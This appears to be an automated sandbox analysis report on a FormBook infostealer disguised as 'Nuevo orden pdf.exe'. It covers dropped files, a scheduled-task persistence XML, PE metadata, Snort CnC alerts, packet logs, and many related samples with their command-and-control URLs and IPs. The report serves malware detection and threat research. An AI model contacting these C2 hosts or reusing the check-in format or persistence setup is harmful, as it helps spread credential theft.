                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                    • VT rate limit hit for: /opt/package/joesandbox/database/analysis/404237/sample/Nuevo orden pdf.exe

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    20:32:08API Interceptor1x Sleep call for process: Nuevo orden pdf.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    184.168.131.241g1EhgmCqCD.exeGet hashmaliciousBrowse
                                                    • www.palomachurch.com/8u3b/?DzrXY=9jYQaMLPhL6iMydi3VPda4ZpO9Nse4x/dRiG0pGEWG94UmnbrF8uLUegU4DyS4zVRk0C&zR-4v=0v1D8ZZ8otVT4F9P
                                                    SWIFT 00395_IMG.exeGet hashmaliciousBrowse
                                                    • www.theboundless.life/bbqo/?Rb=M42dVLz8&XB64XbO8=5cE52+XUn5YOw4VrTBFj5Yjg6Bdl2wnKeIdlDky+FVUstW8yNKK8e4wg1M4nQ/djAnNx
                                                    4GGwmv0AJm.exeGet hashmaliciousBrowse
                                                    • www.politicalnobody.com/.q0os/?action=fbgen&v=110&crc=669
                                                    don.exeGet hashmaliciousBrowse
                                                    • www.montcoimmigrationlawyer.com/uoe8/?Y4plXns=DVW7OxuTiipzhEotDzIJzGfsiMq3vXOqW3PM8kZWjghPJAmdu1p3BOMI8OM6bfwnU86n&BR=cjlpd
                                                    Comand#U0103 de achizi#U021bie PP050321.exeGet hashmaliciousBrowse
                                                    • www.shoprodeovegas.com/xcl/?DVodV=VtxhA2oX1n1prL&aRm4ZbJP=Q4feKhQOcUvJUP8oz4L5oOA8XtI+UFUMw1FgXJ9gQG3EsyP4HUo30rkjHaPboD73BEgI
                                                    O1E623TjjW.exeGet hashmaliciousBrowse
                                                    • www.mojilifenoosa.com/uoe8/?hL3=CVv7qMV6HbciCWFzqhUZZAQ0US+YdWqRbJ1eYpd5+PQQEEyRiYk8iw/aqidrZZ92WW4b0bAtNQ==&lN68=VTUTzPuXE25p9L
                                                    product specification.xlsxGet hashmaliciousBrowse
                                                    • www.catherineandwilson.com/uoe8/?3fz=KdZiceDtrkPSh5wICXOYCMhbIwexAutPvfm5ku1h+ZdZhJi6amIzeeuRyyZPsh51ag6xYA==&-Z54yn=EN9puliPkdzp4
                                                    9DWvynenEDJ11fY.exeGet hashmaliciousBrowse
                                                    • www.presentationmagic.online/hsd/?QFQH4r=1bG8ElMXxJthtncP&qFN41JEh=gbeajf+ETOHEP0PZHUr0sH0pmTI6pJIXyLWb6Ib5oE0X8yNQm9fn6k4Inoesq/tjFe61
                                                    PURCHASE ORDER.exeGet hashmaliciousBrowse
                                                    • www.xn--demirelik-u3a.com/u8nw/?pPB=jabiRJB0+7MeKC/lblDeYefgEQ6ZikoDt3u4Qwck14FnjpsvvdwaEw6ThFlMbwfIqHdYGe9kyQ==&Hpq=V6AHiBHXhz5LI4
                                                    ETC-B72-LT-0149-03-AR.exeGet hashmaliciousBrowse
                                                    • www.shoprodeovegas.com/xcl/?0L0tLd=Q4feKhQOcUvJUP8oz4L5oOA8XtI+UFUMw1FgXJ9gQG3EsyP4HUo30rkjHaPboD73BEgI&jFNTjJ=aFNTkJDx
                                                    493bfe21_by_Libranalysis.exeGet hashmaliciousBrowse
                                                    • www.bodrope.com/8njn/?CTvX=cvRh_lYP&uFNl=Q5lxd4nOV6z6CcdYecjp1LutROUMPU3SQE6azJE1Czw7E14vrt/nRyUCs3zJRvNDQvTm
                                                    krJF4BtzSv.exeGet hashmaliciousBrowse
                                                    • www.smarthealthubclub.com/oerg/?YL0=8pN4l4&r6A=9BaAtcK5xATnUYN0KSqZEziiqzIuiVppJqo/+bNoUNfJehdCQkqUVzs22u6IBE0AgZIm
                                                    MRQUolkoK7.exeGet hashmaliciousBrowse
                                                    • www.ottawahomevalues.info/8u3b/?9rwxC4Lh=xUmcyzOk4AdBu/tilHHAKcZZd7JmKNqhEsoN8UKLLkcB2vFqOaieKULrS5S3/+NfkzmCUnU9lg==&o2=iN68aFPHs
                                                    PO20210429.xlsxGet hashmaliciousBrowse
                                                    • www.abundando.com/8u3b/?Mz=ltx0qfi0x45&WBZXQ8j=VA7b8QnIVeQJLb4vJ/jdAFdrsC+XTLKBbUdPfJTqVxRnd+9E52kRPAdLCgwgRBmqlhQAqg==
                                                    z5Wqivscwd.exeGet hashmaliciousBrowse
                                                    • www.essential.care/f0sg/?9rQPJl=g9LzgpKuBvImk0kG+GJMLFKZevb+pnBUPQILZLjjt7sgNrDsNlImg91PoYPi1VOUwj/O&EzrtFB=4hL05l3xNH1L
                                                    DHL_S390201.exeGet hashmaliciousBrowse
                                                    • www.thevandolly.com/u2gd/?Rnm=XPc43lnxP&IDKPY0x=9TQa0wIlBYwfJDwG2Z9hvZYJBv0iycAFxoKvqpGfSPWIdmtTiS4MQ+I/8YKrwePIIqW4
                                                    SWIFT COPY.exeGet hashmaliciousBrowse
                                                    • www.brad-caroline.com/gnf/?LZhxv=apOpNte8alFpO6vP&7nE4Zlw=g15J7GGOuse5iUv+r/h5g/mBWked130OqUrJnFmD3Jgb0UMGkh9+WkxhJWheCXb3PGqf
                                                    AL-IEDAHINV.No09876543.exeGet hashmaliciousBrowse
                                                    • www.ssssummit.com/uv34/?gjKTUx=6lchmDL0&rnKTobm=WMQTG0rumw6bKas1ntyyM+QsxkhHxu1ZUcBmNY6ij7cyCWSVhqmkPYQs9C/7EVYcnBE0
                                                    letterhead.exeGet hashmaliciousBrowse
                                                    • www.accidentattorneynearme.net/epms/?x4uDfZgH=njiKImUeNemx2H2C1bki9Spb1pz8bRxtrDi2F8yKp6wD2n21irAidQ0QvvZYOXwohy7E&Cj30v=9rJhur7HoF7lOxC
                                                    Updated April SOA.xlsxGet hashmaliciousBrowse
                                                    • www.bookbeachchairs.com/hx3a/?BDH=EBC1Cs7p3SY2xjAhEgLKPc+2rIVZ9PU/AWUwkk97HGSV6MybJ9/jFRm9oMKT03OILBUCjg==&SH6=u2JtglFH

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

                                                    ASN

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    AS-26496-GO-DADDY-COM-LLCUSg1EhgmCqCD.exeGet hashmaliciousBrowse
                                                    • 184.168.131.241
                                                    TT.exeGet hashmaliciousBrowse
                                                    • 107.180.41.236
                                                    SWIFT 00395_IMG.exeGet hashmaliciousBrowse
                                                    • 184.168.131.241
                                                    4GGwmv0AJm.exeGet hashmaliciousBrowse
                                                    • 50.62.168.157
                                                    c647b2da_by_Libranalysis.exeGet hashmaliciousBrowse
                                                    • 184.168.131.241
                                                    HAWB AND INV.exeGet hashmaliciousBrowse
                                                    • 107.180.57.119
                                                    Inquiry 05042021.docGet hashmaliciousBrowse
                                                    • 107.180.43.16
                                                    don.exeGet hashmaliciousBrowse
                                                    • 184.168.131.241
                                                    Comand#U0103 de achizi#U021bie PP050321.exeGet hashmaliciousBrowse
                                                    • 184.168.131.241
                                                    O1E623TjjW.exeGet hashmaliciousBrowse
                                                    • 184.168.131.241
                                                    product specification.xlsxGet hashmaliciousBrowse
                                                    • 184.168.131.241
                                                    9DWvynenEDJ11fY.exeGet hashmaliciousBrowse
                                                    • 184.168.131.241
                                                    PURCHASE ORDER.exeGet hashmaliciousBrowse
                                                    • 184.168.131.241
                                                    ETC-B72-LT-0149-03-AR.exeGet hashmaliciousBrowse
                                                    • 184.168.131.241
                                                    SecuriteInfo.com.Heur.3869.xlsGet hashmaliciousBrowse
                                                    • 192.186.217.35
                                                    SecuriteInfo.com.Heur.3869.xlsGet hashmaliciousBrowse
                                                    • 192.186.217.35
                                                    SecuriteInfo.com.Heur.12433.xlsGet hashmaliciousBrowse
                                                    • 192.186.217.35
                                                    SecuriteInfo.com.Heur.12433.xlsGet hashmaliciousBrowse
                                                    • 192.186.217.35
                                                    Documents_1906038956_974385067.xlsGet hashmaliciousBrowse
                                                    • 192.186.217.35
                                                    Documents_1906038956_974385067.xlsGet hashmaliciousBrowse
                                                    • 192.186.217.35
                                                    DIGITALOCEAN-ASNUS08917506_by_Libranalysis.exeGet hashmaliciousBrowse
                                                    • 206.189.46.186
                                                    fbca5ac9_by_Libranalysis.dllGet hashmaliciousBrowse
                                                    • 159.203.93.122
                                                    fbca5ac9_by_Libranalysis.dllGet hashmaliciousBrowse
                                                    • 159.203.93.122
                                                    1a92153c_by_Libranalysis.dllGet hashmaliciousBrowse
                                                    • 159.203.93.122
                                                    1a92153c_by_Libranalysis.dllGet hashmaliciousBrowse
                                                    • 159.203.93.122
                                                    e577256b_by_Libranalysis.dllGet hashmaliciousBrowse
                                                    • 159.203.93.122
                                                    e577256b_by_Libranalysis.dllGet hashmaliciousBrowse
                                                    • 159.203.93.122
                                                    2f50000.exeGet hashmaliciousBrowse
                                                    • 46.101.183.160
                                                    4d8c102b_by_Libranalysis.dllGet hashmaliciousBrowse
                                                    • 159.203.93.122
                                                    4d8c102b_by_Libranalysis.dllGet hashmaliciousBrowse
                                                    • 159.203.93.122
                                                    28e19445_by_Libranalysis.dllGet hashmaliciousBrowse
                                                    • 159.203.93.122
                                                    28e19445_by_Libranalysis.dllGet hashmaliciousBrowse
                                                    • 159.203.93.122
                                                    ad2cc5c6_by_Libranalysis.dllGet hashmaliciousBrowse
                                                    • 159.203.93.122
                                                    ad2cc5c6_by_Libranalysis.dllGet hashmaliciousBrowse
                                                    • 159.203.93.122
                                                    2dc106fa_by_Libranalysis.dllGet hashmaliciousBrowse
                                                    • 159.203.93.122
                                                    12216ea2_by_Libranalysis.dllGet hashmaliciousBrowse
                                                    • 159.203.93.122
                                                    12216ea2_by_Libranalysis.dllGet hashmaliciousBrowse
                                                    • 159.203.93.122
                                                    70e645c6_by_Libranalysis.dllGet hashmaliciousBrowse
                                                    • 159.203.93.122
                                                    70e645c6_by_Libranalysis.dllGet hashmaliciousBrowse
                                                    • 159.203.93.122
                                                    bba0c41e_by_Libranalysis.dllGet hashmaliciousBrowse
                                                    • 159.203.93.122

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Nuevo orden pdf.exe.log
                                                    Process:C:\Users\user\Desktop\Nuevo orden pdf.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:modified
                                                    Size (bytes):1314
                                                    Entropy (8bit):5.350128552078965
                                                    Encrypted:false
                                                    SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                    MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                    SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                    SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                    SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                    Malicious:true
                                                    Reputation:high, very likely benign file
                                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                                    C:\Users\user\AppData\Local\Temp\tmpA401.tmp
                                                    Process:C:\Users\user\Desktop\Nuevo orden pdf.exe
                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):1644
                                                    Entropy (8bit):5.19338596048242
                                                    Encrypted:false
                                                    SSDEEP:24:2dH4+SEqC/Q7hxlNMFp1/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKB/tn:cbh47TlNQ//rydbz9I3YODOLNdq3D
                                                    MD5:E61B1F1504FEE0014F276BA4BEDCBAEF
                                                    SHA1:1DE67195E7B49B35F4D287417A63C092E2633E14
                                                    SHA-256:82CB1C94A5AAB94F0C51581E1439829D277617146448553E9B23A736A2D7BD73
                                                    SHA-512:5EB642BDC9EE7211947C2CB80CE4053B7590424E0FC0956AD26FF072ED2D9B934A0B2A1587D862AB92C17C4A9871F5456C39673A46281D668A4591B4542C220F
                                                    Malicious:true
                                                    Reputation:low
                                                    Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true
                                                    C:\Users\user\AppData\Roaming\NkwKQPLeekw.exe
                                                    Process:C:\Users\user\Desktop\Nuevo orden pdf.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):907776
                                                    Entropy (8bit):7.652560267599121
                                                    Encrypted:false
                                                    SSDEEP:12288:hjGTBHP8LKMTnc2NOAbLWVUuxM5XQTOUZ9V6EnReYLuIsguNA4D6VvxErz2cqPSs:hjy9xkXB09V6EnRhxODMvmXsDds
                                                    MD5:02A32CC05EFBF5236A8C0928D3C9170E
                                                    SHA1:FA3A639F15116DA149B14D832B9255528F0BFE65
                                                    SHA-256:5930CFA7DD5664E104C299FCE83451021349922B6B02774235EAE6BD14FAD464
                                                    SHA-512:22C8BA32AF4A695410652D2D6FCBF79E1804EB9FFD4328F5377E20485052366F53467FC6691070787AE750D8C5B8304E446DF803B0375CA45268BC1E264F26EA
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    Reputation:low
                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...o.................P.............n.... ........@.. .......................@............@.....................................O............................ ....................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................P.......H...........\............................................................0............(....(..........(.....o.....*.....................( ......(!......("......(#......($....*N..(....oU...(%....*&..(&....*.s'........s(........s)........s*........s+........*....0...........~....o,....+..*.0...........~....o-....+..*.0...........~....o.....+..*.0...........~....o/....+..*.0...........~....o0....+..*&..(1....*...0..<........~.....(2.....,!r...p.....(3...o4...s5............~.....
                                                    C:\Users\user\AppData\Roaming\NkwKQPLeekw.exe:Zone.Identifier
                                                    Process:C:\Users\user\Desktop\Nuevo orden pdf.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):26
                                                    Entropy (8bit):3.95006375643621
                                                    Encrypted:false
                                                    SSDEEP:3:ggPYV:rPYV
                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                    Malicious:true
                                                    Preview: [ZoneTransfer]....ZoneId=0

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Entropy (8bit):7.652560267599121
                                                    TrID:
                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                    • Windows Screen Saver (13104/52) 0.07%
                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                    File name:Nuevo orden pdf.exe
                                                    File size:907776
                                                    MD5:02a32cc05efbf5236a8c0928d3c9170e
                                                    SHA1:fa3a639f15116da149b14d832b9255528f0bfe65
                                                    SHA256:5930cfa7dd5664e104c299fce83451021349922b6b02774235eae6bd14fad464
                                                    SHA512:22c8ba32af4a695410652d2d6fcbf79e1804eb9ffd4328f5377e20485052366f53467fc6691070787ae750d8c5b8304e446df803b0375ca45268bc1e264f26ea
                                                    SSDEEP:12288:hjGTBHP8LKMTnc2NOAbLWVUuxM5XQTOUZ9V6EnReYLuIsguNA4D6VvxErz2cqPSs:hjy9xkXB09V6EnRhxODMvmXsDds
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...o.................P.............n.... ........@.. .......................@............@................................

                                                    File Icon

                                                    Icon Hash:00828e8e8686b000

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x4def6e
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                    Time Stamp:0xEAA2096F [Tue Sep 28 04:49:51 2094 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:v4.0.30319
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                    Entrypoint Preview

                                                    Instruction
                                                    jmp dword ptr [00402000h]
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al

                                                    Data Directories

                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xdef1c0x4f.text
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xe00000x5b4.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xe20000xc.reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0xdef000x1c.text
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                    Sections

                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x20000xdcf740xdd000False0.846478630515data7.65919160699IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                    .rsrc0xe00000x5b40x600False0.421223958333data4.08739735314IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .reloc0xe20000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                    Resources

                                                    NameRVASizeTypeLanguageCountry
                                                    RT_VERSION0xe00900x324data
                                                    RT_MANIFEST0xe03c40x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                    Imports

                                                    DLLImport
                                                    mscoree.dll_CorExeMain

                                                    Version Infos

                                                    DescriptionData
                                                    Translation0x0000 0x04b0
                                                    LegalCopyrightCopyright 2019
                                                    Assembly Version1.0.0.0
                                                    InternalNameSize.exe
                                                    FileVersion1.0.0.0
                                                    CompanyName
                                                    LegalTrademarks
                                                    Comments
                                                    ProductNameStarEggControl
                                                    ProductVersion1.0.0.0
                                                    FileDescriptionStarEggControl
                                                    OriginalFilenameSize.exe

                                                    Network Behavior

                                                    Snort IDS Alerts

                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                    05/04/21-20:33:17.211909TCP2031453ET TROJAN FormBook CnC Checkin (GET)4972880192.168.2.3178.128.103.114
                                                    05/04/21-20:33:17.211909TCP2031449ET TROJAN FormBook CnC Checkin (GET)4972880192.168.2.3178.128.103.114
                                                    05/04/21-20:33:17.211909TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972880192.168.2.3178.128.103.114
                                                    05/04/21-20:33:56.613141TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973680192.168.2.334.102.136.180
                                                    05/04/21-20:33:56.613141TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973680192.168.2.334.102.136.180
                                                    05/04/21-20:33:56.613141TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973680192.168.2.334.102.136.180
                                                    05/04/21-20:33:56.750116TCP1201ATTACK-RESPONSES 403 Forbidden804973634.102.136.180192.168.2.3

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    May 4, 2021 20:33:16.916558027 CEST4972880192.168.2.3178.128.103.114
                                                    May 4, 2021 20:33:17.211694956 CEST8049728178.128.103.114192.168.2.3
                                                    May 4, 2021 20:33:17.211803913 CEST4972880192.168.2.3178.128.103.114
                                                    May 4, 2021 20:33:17.211909056 CEST4972880192.168.2.3178.128.103.114
                                                    May 4, 2021 20:33:17.506753922 CEST8049728178.128.103.114192.168.2.3
                                                    May 4, 2021 20:33:17.513118982 CEST8049728178.128.103.114192.168.2.3
                                                    May 4, 2021 20:33:17.513158083 CEST8049728178.128.103.114192.168.2.3
                                                    May 4, 2021 20:33:17.513268948 CEST4972880192.168.2.3178.128.103.114
                                                    May 4, 2021 20:33:17.513339043 CEST4972880192.168.2.3178.128.103.114
                                                    May 4, 2021 20:33:17.809281111 CEST8049728178.128.103.114192.168.2.3
                                                    May 4, 2021 20:33:35.782933950 CEST4973580192.168.2.3184.168.131.241
                                                    May 4, 2021 20:33:35.976645947 CEST8049735184.168.131.241192.168.2.3
                                                    May 4, 2021 20:33:35.976763964 CEST4973580192.168.2.3184.168.131.241
                                                    May 4, 2021 20:33:35.976903915 CEST4973580192.168.2.3184.168.131.241
                                                    May 4, 2021 20:33:36.169887066 CEST8049735184.168.131.241192.168.2.3
                                                    May 4, 2021 20:33:36.241235971 CEST8049735184.168.131.241192.168.2.3
                                                    May 4, 2021 20:33:36.241264105 CEST8049735184.168.131.241192.168.2.3
                                                    May 4, 2021 20:33:36.241421938 CEST4973580192.168.2.3184.168.131.241
                                                    May 4, 2021 20:33:36.241481066 CEST4973580192.168.2.3184.168.131.241
                                                    May 4, 2021 20:33:36.434458971 CEST8049735184.168.131.241192.168.2.3
                                                    May 4, 2021 20:33:56.571717024 CEST4973680192.168.2.334.102.136.180
                                                    May 4, 2021 20:33:56.612833977 CEST804973634.102.136.180192.168.2.3
                                                    May 4, 2021 20:33:56.612957954 CEST4973680192.168.2.334.102.136.180
                                                    May 4, 2021 20:33:56.613141060 CEST4973680192.168.2.334.102.136.180
                                                    May 4, 2021 20:33:56.653806925 CEST804973634.102.136.180192.168.2.3
                                                    May 4, 2021 20:33:56.750116110 CEST804973634.102.136.180192.168.2.3
                                                    May 4, 2021 20:33:56.750138998 CEST804973634.102.136.180192.168.2.3
                                                    May 4, 2021 20:33:56.750308037 CEST4973680192.168.2.334.102.136.180
                                                    May 4, 2021 20:33:56.750432968 CEST4973680192.168.2.334.102.136.180
                                                    May 4, 2021 20:33:56.792601109 CEST804973634.102.136.180192.168.2.3

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    May 4, 2021 20:31:58.183655024 CEST5128153192.168.2.38.8.8.8
                                                    May 4, 2021 20:31:58.205101967 CEST53502008.8.8.8192.168.2.3
                                                    May 4, 2021 20:31:58.218801975 CEST4919953192.168.2.38.8.8.8
                                                    May 4, 2021 20:31:58.232309103 CEST53512818.8.8.8192.168.2.3
                                                    May 4, 2021 20:31:58.269588947 CEST53491998.8.8.8192.168.2.3
                                                    May 4, 2021 20:31:59.400675058 CEST5062053192.168.2.38.8.8.8
                                                    May 4, 2021 20:31:59.449636936 CEST53506208.8.8.8192.168.2.3
                                                    May 4, 2021 20:32:00.909538984 CEST6493853192.168.2.38.8.8.8
                                                    May 4, 2021 20:32:00.962876081 CEST53649388.8.8.8192.168.2.3
                                                    May 4, 2021 20:32:01.809108973 CEST6015253192.168.2.38.8.8.8
                                                    May 4, 2021 20:32:01.857821941 CEST53601528.8.8.8192.168.2.3
                                                    May 4, 2021 20:32:01.935019016 CEST5754453192.168.2.38.8.8.8
                                                    May 4, 2021 20:32:01.995974064 CEST53575448.8.8.8192.168.2.3
                                                    May 4, 2021 20:32:03.024872065 CEST5598453192.168.2.38.8.8.8
